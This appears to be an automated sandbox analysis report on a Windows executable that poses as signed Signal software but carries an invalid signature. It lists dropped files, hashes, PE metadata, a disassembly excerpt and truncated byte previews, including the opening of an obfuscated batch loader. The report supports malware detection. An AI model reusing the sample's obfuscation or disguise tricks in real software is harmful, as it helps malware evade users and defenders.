                                                                                        SHA1:98FACEF8822449D50DEDB74146FC57B18ECE028C
                                                                                        SHA-256:3E7C22499C550A54929E15708217D26A21A9EBD42C1452700233EA73B0E15A16
                                                                                        SHA-512:65F1E4742D7DFE92AADD1C776C48AAAF40BBF52E25641E6C5518A423FB64F2F12E282D961F0B2FFF0513A88AE5C94F3484A386F81D7857F9744D8B1DB1C72F65
                                                                                        Malicious:false
                                                                                        Preview:j..8@M.S....j.j..|@M.V..........8@M.D...3.@.d@M.VSf.h@M.3.PPj PPP.u.P....I.^[..t..5|@M...`.I.]...U..S.].VW.}.j.^.W..U.9.............95d)M.|~.T)M........tg9Q.ub.........tT.........;.....t........t:...t5...t0j..1.. .I..T)M............@t........u.j..0..T.I..U.C;.d)M.~..].......95d)M........T)M........tj9Q.ue.......t\.......;.....uM...... uDj..1.. .I..T)M.j.......0.. .I..T)M............@t........u.j..0..T.I..U.F;5d)M...x...j.Sh............H.I._^[]...U..QQ.e...M.SVW..;...]...S.E........}.Y...vph..L.S........Y..CP.....YY....h..L.S.E........Y..CQ.....YY....h..L.S.E.......Y..CQ.w...YY..t}.}..uw.}..u#.......h. ..P.......Pj.Sj.....I..E..}.........M..I&............~..}..........y....+..f........E.j.......j.P.....j2j.S..p.I...M...t..}..uJ.M..............M.j.P.......Pj..1.u.....I..E...uvP.......P.......Pj....P.Q..~$.......j.P.......Pj....PQ....I..E....E...u..M......E.j..........P.......Pj.Q.u.....I..E..u.....I......Pj.VS....I...h.t..wh..<.I..E..5H.I.j.P.Gh.?hp...W..j.hr...jdW..}...M....
                                                                                        Process:C:\Users\user\Desktop\eMBO6wS1b5.exe
                                                                                        File Type:ASCII text, with very long lines (1053), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):23598
                                                                                        Entropy (8bit):5.093107806004424
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:zAVjsQEl8vKFM8E7+FOMqAOxpFb7s8fvH25X44bdYsqk+C/GGlcau0AWXzAo:zAFA8vkEQOCObFb7s8Xd4mxxFG9u01D5
                                                                                        MD5:8B8493F4FECBD46319EB5D801A3B1219
                                                                                        SHA1:8978B1C7367D4E6574D3CE5D173F258A0595BAAD
                                                                                        SHA-256:44919A4E9E169BABE5E100A0BC7F19DC1E6985CB7F657DCAC3765BDBD6FED665
                                                                                        SHA-512:FC041A3A5A099937E175120B3BCF836FA7BFFF1A9ED133D445E4BE8022B94110ADFBE0BC714F7129054A5B4B3C2A44CCDEC49486797077AA5A9FB27B872C9297
                                                                                        Malicious:false
                                                                                        Preview:Set Curve=J..EGRentals-Couple-Yale-..BPCnetcom-Gmt-..cLTFirefox-Christian-..VgayAnnie-Hot-..rAWeb-Province-Lm-Choosing-Compatible-Context-Sacred-..vBaAddresses-Treated-Settlement-Sega-..qrTuner-..QhdCompare-Operating-Collectables-..Set Mitchell=c..bCIqRestored-Encouraging-Harvard-Well-Christopher-Compound-Version-..sgiPoultry-Amsterdam-Lighting-Personnel-Majority-Tile-Cross-Pendant-..TTFUNamibia-Selecting-Accordance-Matters-Lecture-..HklSurgical-..orDetect-Arms-Storage-Achievement-Honors-..Set Modems=m..pgQMysterious-..xcDildos-..YCJEntire-Criminal-Eva-Pride-Bracket-Sleeps-Around-Phys-Existence-..HtBk-Boats-Enormous-Prerequisite-..zjBowl-Arnold-Wheat-Making-Grams-Occasion-Observations-..uhDeviant-Isolated-..Set Amounts=P..CXGAGovernments-Adams-Routine-Astronomy-Holmes-Na-..jBXPhotographic-Massive-Hoped-Wayne-Machinery-Builds-Logged-..QWAffiliate-Yes-Bonus-Down-Address-Playlist-Agreed-Ieee-..EGATCivic-Breeding-Earn-Section-Bicycle-Tx-..ZpvVan-Treasury-Displays-Hour-..vJHWt-Sacramento-Vi
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:ASCII text, with very long lines (1053), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):23598
                                                                                        Entropy (8bit):5.093107806004424
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:zAVjsQEl8vKFM8E7+FOMqAOxpFb7s8fvH25X44bdYsqk+C/GGlcau0AWXzAo:zAFA8vkEQOCObFb7s8Xd4mxxFG9u01D5
                                                                                        MD5:8B8493F4FECBD46319EB5D801A3B1219
                                                                                        SHA1:8978B1C7367D4E6574D3CE5D173F258A0595BAAD
                                                                                        SHA-256:44919A4E9E169BABE5E100A0BC7F19DC1E6985CB7F657DCAC3765BDBD6FED665
                                                                                        SHA-512:FC041A3A5A099937E175120B3BCF836FA7BFFF1A9ED133D445E4BE8022B94110ADFBE0BC714F7129054A5B4B3C2A44CCDEC49486797077AA5A9FB27B872C9297
                                                                                        Malicious:false
                                                                                        Preview:Set Curve=J..EGRentals-Couple-Yale-..BPCnetcom-Gmt-..cLTFirefox-Christian-..VgayAnnie-Hot-..rAWeb-Province-Lm-Choosing-Compatible-Context-Sacred-..vBaAddresses-Treated-Settlement-Sega-..qrTuner-..QhdCompare-Operating-Collectables-..Set Mitchell=c..bCIqRestored-Encouraging-Harvard-Well-Christopher-Compound-Version-..sgiPoultry-Amsterdam-Lighting-Personnel-Majority-Tile-Cross-Pendant-..TTFUNamibia-Selecting-Accordance-Matters-Lecture-..HklSurgical-..orDetect-Arms-Storage-Achievement-Honors-..Set Modems=m..pgQMysterious-..xcDildos-..YCJEntire-Criminal-Eva-Pride-Bracket-Sleeps-Around-Phys-Existence-..HtBk-Boats-Enormous-Prerequisite-..zjBowl-Arnold-Wheat-Making-Grams-Occasion-Observations-..uhDeviant-Isolated-..Set Amounts=P..CXGAGovernments-Adams-Routine-Astronomy-Holmes-Na-..jBXPhotographic-Massive-Hoped-Wayne-Machinery-Builds-Logged-..QWAffiliate-Yes-Bonus-Down-Address-Playlist-Agreed-Ieee-..EGATCivic-Breeding-Earn-Section-Bicycle-Tx-..ZpvVan-Treasury-Displays-Hour-..vJHWt-Sacramento-Vi
                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):985
                                                                                        Entropy (8bit):3.273846248585184
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:zyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:zyGS9PvCA433C+sCNC1
                                                                                        MD5:7375EBDA4B9BD538F8F0AF11126BB90F
                                                                                        SHA1:05F91AD53ABE4AF15BD6ECB565A2738ED3B86484
                                                                                        SHA-256:E754A4F62BF8B9A52233B38AFB6F6783A7B5C2A031C4E1836EB6E9865295A623
                                                                                        SHA-512:89A13E976406763E83F1D271F0BA44DF3B5FEA72A87046DC2C4F0EDECCADA7199918F0540050C705D9DDF1DEF6931C105DAA46712D56FFA4238C16CC58C7BBC9
                                                                                        Malicious:false
                                                                                        Preview:Serve........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B............................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):128000
                                                                                        Entropy (8bit):6.627319010386656
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:v0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBA:v0nEo3tb2j6AUkB0CThp6vmVna
                                                                                        MD5:D90E12EA461FFBCE54C9AB546D847545
                                                                                        SHA1:8487C93A0483C9422DC1C5B80EA68AE88A94B029
                                                                                        SHA-256:279776F38E7A4E361587591523FB406D6C87C95FDE8A921D605078468F0C0D8D
                                                                                        SHA-512:DD9A9E42306897A08912478AE6A3D22AB3980B89070FDC16F4C35DFCC9D704AC681047D852A2A0FD2D80121CB70C3FC11F062D2858A4AF34DAC6C2E63649F2BC
                                                                                        Malicious:false
                                                                                        Preview:.E...;.t.u.+u....u.F.M..._.1^[....U..QQSVWh.......p...YP.M..'....}..E.WHPh...........6..H.I...t.3.f..G.M.W.3a.......M.h..I.."a..2.M..).u.j.Q.....W........_^..[....U....SVW.=H.I..E.P..E.Ph.....u..6..E.;E.sv3.SSj..6.....tf;}.ra;}.r\3.w.j.Z...........Q....YP.E.E.Vj..0..H.I..u..t..E.;.t.3.f..F.E..M...FP.h`....V.m...Y....2._^[....U....SV..M.h.kL.....Q.E..P. ...M...F.....t..C....,h.kL..M....Q.E..P. ...M.........t.......E..0j.Q.6..H.I...t.....2.^[....U....SV..M.h.kL..i...Q.E..P.1 ...M........t..D....,h.kL..M..;...Q.E..P.. ...M.......t......j..u.P.6..H.I...t.....2.^[....U....SV..M.h.kL.....Q.E...P.....M....@.....t..X....,h.kL..M....Q.E...P.....M..........t#......E..0j.Q.6..H.I..M......t.....2.^[....U....SV..M.h.kL..]...Q.E...P.%....M........t..F....,h.kL..M../...Q.E...P......M........t......j.j.P.6..H.I......^[..U... SVW..M.h.kL.....Q.E..P.....M...;.....t..G....E.H....x..:h.kL..M....Q.E..P.r....M.....................E......x.3.SSP.6..H.I..E.
                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):58368
                                                                                        Entropy (8bit):6.698313097324345
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:hwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUnD:PxlHS3NxrHSBRtNPnD
                                                                                        MD5:4EEBC03E522A0878A4E833CBB934E5C7
                                                                                        SHA1:8CC2DD4660272C3F8E115189DD0B18F56839C08F
                                                                                        SHA-256:61BC2C7A4CAF17DD0BD9ED89187420B021D59747543B347C467C1B62B8DA4551
                                                                                        SHA-512:C417A087107F0C0230F8AF4A1C36C23196763A2E3181DE7D1E7DA028140D9B0EAED5933093DB619366BB0F7DFAB3E348FC278665C3E39EEC21B2727179DC6C60
                                                                                        Malicious:false
                                                                                        Preview:........A...j..;.......Q...T..................j.................z}..j..t$.........................D$@.................o....$..DE.........(.........j....V.......x.~f.@...j....@.......yH...H..|9...T9.t..R8....B..|9...D9.t..@8.@...D$@QP...D$H.....H.................~y.........t....ui........$.....$.........$.........$.........0.r...j...$.....$........P....$.....H...._.....$.....>..........L...................E...j...|.I...D....t,..H....v.....|...;.D...r...P.....................3..D$...t$....u(.D$.P..4....T$........|$........t$..............P........D$l..tF.D$lPQ....I..|$l....u.j...P.....l.I...........P.....`.I..D$l.P...................u'.t$@.D$@..y.....L.Q...D$DP...\$H..F......j.P....8.........L...............|.I........g#M....b#M...........Q.D$D.D$D....P...H..............$4...P..T.I...$4...P..L.I.j.j.j...$@...P..........I..8E..8E..8E.r8E..8E.,9E..8E..;E._8E._8E..8E..8E..8E..8E.r8E..8E.,9E..8E..;E.69E.69E..8E..8E..8E..8E.r8E..8E.,9E..8E..;E.69E.69E..8E.\>E...
                                                                                        Process:C:\Users\user\Desktop\eMBO6wS1b5.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):46892
                                                                                        Entropy (8bit):7.9958739827321335
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:yb/b1DNUQ7LR1RjOG2Taw2yAp9iRZy+47rMUqrqCEea8UEZMRqBqOiSY7+U5wrqO:obbUQ7zlmOdFibyjr5kqjea8nBtRzmq3
                                                                                        MD5:58F23126D9C59D6B08CF125161AC7F32
                                                                                        SHA1:CC6299338D1E113B1DE8902AE7135AAABB23A98C
                                                                                        SHA-256:B02D4EB194AE40128E66DFAF0DAB38901599B44496DD8BB9876C95EFBBD8978D
                                                                                        SHA-512:A524A902E9496AFB4432FB2A580B3AB244F52625D699143A09687C13485F4949DA09E2DC95E2A9723DACEE9D8B92204D74B3D5BCB7C96BA57176ED75AEF6628C
                                                                                        Malicious:false
                                                                                        Preview:...^2./....+.D./n.....G..+..6...x.yVG...*D.-)E..&.P..t..*^....e..d...9..Dw...b..:.S....Xn..O.MZ..j..px.M..\...L...]m.9..9>m..#..{.l`......{Z8.f.........s..R...852.q..._..).r.D...L.g.jX.!.O.D..h...dIq};.#.....I....P.{.6g..RO..N...6..-Um8L[._.U..@.......V.....qk.x.....g.Y Q.&v.QF..dyJ-.WL..v.^..R..G.......8<%h.y0...k?..C.4;....t...m....5..%.C.s......H..i...E.Rgd..5(....u...<F..........8.7...<.W..,....X5..T.....z..:.=..s..........hhu|D.~..P....k.r..C`w.E@...d.1........E..q.-....(.\.b..cPIN...o%S.\.uTZiu?.c:<.JoEst...d..P6.[..Z E.;.6dI..8N.{35:...Ox.QBoA.,..........|.....7...h.d~...*`'.X..L|..><.3p.....2.P1(.M.|..\....y..(}..QE......../.[...........x..(......X..|3.W..n.7UO...H.n...vB.&..xF6...>W.>.W.@.uZ-.....u.X...k....Q~.Bg...z....*....C.';.......~.2Fm8.I..Q.]....n.X..^.....>......]fu..^....#....o.OD.NC..0...Quf...GVI..m..J.uQ].Wo...a"8.s.i...|..o...t..{B.W.....'x..\....R..<.Y..y.\..J.4.F.."..@....Tn2$...t..4...K1.../...O........Pz.Q...m..
                                                                                        Process:C:\Users\user\Desktop\eMBO6wS1b5.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):87040
                                                                                        Entropy (8bit):7.998032618021949
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:KeKplFRvqMGv7+X7kEm6bSTpX8SlpsE9hD7zKC6lk6vRNKc6M5kE7JN9xSK0ar2d:LKplzCM47DEmECMkpsE9hXzKCpWNkIav
                                                                                        MD5:EF211EE574F7C2F1681D8E438A472A68
                                                                                        SHA1:926BED4F9537F175660D1365F7027A02BE7407DE
                                                                                        SHA-256:49FEAD0B167792DB6F99920D21F28400C7CA5EA815D69445E468661CA790E7BF
                                                                                        SHA-512:B06333D1262B5EEDCFBCA4D90F3F2757CE92709B09686A63169406869C4F328AB6AA5986943D81649C1DF7F656F76805CB1B76C1C39F0C5123F5B294FC2BE30B
                                                                                        Malicious:false
                                                                                        Preview:...>dcf(.........<V.7....#.s....5&..y...5....;..+......rZ........k).gY.O.D.!...F..%).'.I..)...Zr....'....C...*;...8...../......._.Z.....BL....4.*...Q.X.....b..JXN.xp..|_..\Xq\...Ma....mze.....d%,..k.G.8.r.I....V.Ep..F.m.9..h.V..\Mn....2y..f...P.%......'..I.2.&2.fG..3.tVn......8.R...E...h.....=qA..r.N0.......aQ.g..l......@..6...k.6...g;..*gga...<....};..Z..R}>..m..5..]c......3..B...~N~c,|...`~.d.0.M...2.............(.q..]..)!".].M.@...%`.Q...U.n...9tQ.....R../.ea..o.z...*......M.".%.......V?.........,..m..V..~...q.c..=.j.........'.Q...q..._t.,0.....j!..........P....oi..dRJ.Pz.......|.....u7.~A./.^..1,d.oVV.(>K.J..gx.).........w...].M.$Q..Mv$.....0@+..C.a.i..\....,.H...wF.G.i.I.8.x]9+.....!..=.}&.2.Z....F..&o.O4._....!(..lgUJS......RH<.5;.c.....J.n.`kB....o......m..]......G...X.k...?.U.......S...1?....."/?1).9...6.~^9..z.x<...0y..W3tY..........8...N...Z{9FF3.fLq.,3i.6..xN.....#..)...}z.s..l.o...p!w*......R#o.==.l..@.-"..z..@$.
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.97632858227613
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:eMBO6wS1b5.exe
                                                                                        File size:1'325'507 bytes
                                                                                        MD5:73565a0bcdcb7ff5f9ce005a2530e215
                                                                                        SHA1:d5b3f48caa2b3c5bd9258cc3f8ce7b41c3d5b22b
                                                                                        SHA256:0da872d62bc25e38d6eac1f6d2f35f8301dfa06087cc68c50ea93f326f934b8c
                                                                                        SHA512:2fb0e16e47318fc2244f49cfc2a5aa0ccb966f6c13e4f87f4b4cff6f32c861c811963419ce3da13eaa62d00896dada8a8eb46798b52ea3981adc1ae442e0aa0c
                                                                                        SSDEEP:24576:RfGPIqJvUwjujvpjGcN05TLG3nBD4bEeVSnwtI9u6S7kh1kleY8kQQkqcU:F4JvUwjuj0cW5ToBDcEoAwI1kl6k+m
                                                                                        TLSH:A35533DA890E403BFAE449B43A68DD5A7736FE253DF0C90F8708CE885A907D5C351B69
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                        Icon Hash:f8f0e0b0b0b0b23a
                                                                                        Entrypoint:0x4038af
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                        Signature Valid:false
                                                                                        Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                        Error Number:-2146869232
                                                                                        Not Before, Not After
                                                                                        • 11/09/2024 15:33:41 12/09/2027 15:33:41
                                                                                        Subject Chain
                                                                                        • CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
                                                                                        Version:3
                                                                                        Thumbprint MD5:D4E75D16F15BD3BC32ACDF4EAF83A59A
                                                                                        Thumbprint SHA-1:8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
                                                                                        Thumbprint SHA-256:44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
                                                                                        Serial:4EF1C2D67B37517957F42E8D
                                                                                        Instruction
                                                                                        sub esp, 000002D4h
                                                                                        push ebx
                                                                                        push ebp
                                                                                        push esi
                                                                                        push edi
                                                                                        push 00000020h
                                                                                        xor ebp, ebp
                                                                                        pop esi
                                                                                        mov dword ptr [esp+18h], ebp
                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                        mov dword ptr [esp+14h], ebp
                                                                                        call dword ptr [00409030h]
                                                                                        push 00008001h
                                                                                        call dword ptr [004090B4h]
                                                                                        push ebp
                                                                                        call dword ptr [004092C0h]
                                                                                        push 00000008h
                                                                                        mov dword ptr [0047EB98h], eax
                                                                                        call 00007F6AB8BF2F4Bh
                                                                                        push ebp
                                                                                        push 000002B4h
                                                                                        mov dword ptr [0047EAB0h], eax
                                                                                        lea eax, dword ptr [esp+38h]
                                                                                        push eax
                                                                                        push ebp
                                                                                        push 0040A264h
                                                                                        call dword ptr [00409184h]
                                                                                        push 0040A24Ch
                                                                                        push 00476AA0h
                                                                                        call 00007F6AB8BF2C2Dh
                                                                                        call dword ptr [004090B0h]
                                                                                        push eax
                                                                                        mov edi, 004CF0A0h
                                                                                        push edi
                                                                                        call 00007F6AB8BF2C1Bh
                                                                                        push ebp
                                                                                        call dword ptr [00409134h]
                                                                                        cmp word ptr [004CF0A0h], 0022h
                                                                                        mov dword ptr [0047EAB8h], eax
                                                                                        mov eax, edi
                                                                                        jne 00007F6AB8BF051Ah
                                                                                        push 00000022h
                                                                                        pop esi
                                                                                        mov eax, 004CF0A2h
                                                                                        push esi
                                                                                        push eax
                                                                                        call 00007F6AB8BF28F1h
                                                                                        push eax
                                                                                        call dword ptr [00409260h]
                                                                                        mov esi, eax
                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                        jmp 00007F6AB8BF05A3h
                                                                                        push 00000020h
                                                                                        pop ebx
                                                                                        cmp ax, bx
                                                                                        jne 00007F6AB8BF051Ah
                                                                                        add esi, 02h
                                                                                        cmp word ptr [esi], bx
                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                        • [LNK] VS2010 SP1 build 40219
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x482ee.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1408530x3170.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x1000000x482ee0x4840007f04b8d41bceabff3e5ea756f544601False0.9850170307093425data7.926338781448185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x1490000xfd60x100007fd20e372e797fd8c2ac92cfe6e53aaFalse0.568359375data5.315344493199193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x1002980x3baccPNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9929345246862061
                                                                                        RT_ICON0x13bd640x7a24PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005117052577714
                                                                                        RT_ICON0x1437880x2dbaPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0009396890483513
                                                                                        RT_ICON0x1465440x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7834699453551912
                                                                                        RT_ICON0x14766c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8679078014184397
                                                                                        RT_DIALOG0x147ad40x100dataEnglishUnited States0.5234375
                                                                                        RT_DIALOG0x147bd40x11cdataEnglishUnited States0.6056338028169014
                                                                                        RT_DIALOG0x147cf00x60dataEnglishUnited States0.7291666666666666
                                                                                        RT_GROUP_ICON0x147d500x4cdataEnglishUnited States0.8157894736842105
                                                                                        RT_VERSION0x147d9c0x27cdataEnglishUnited States0.4968553459119497
                                                                                        RT_MANIFEST0x1480180x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                        DLLImport
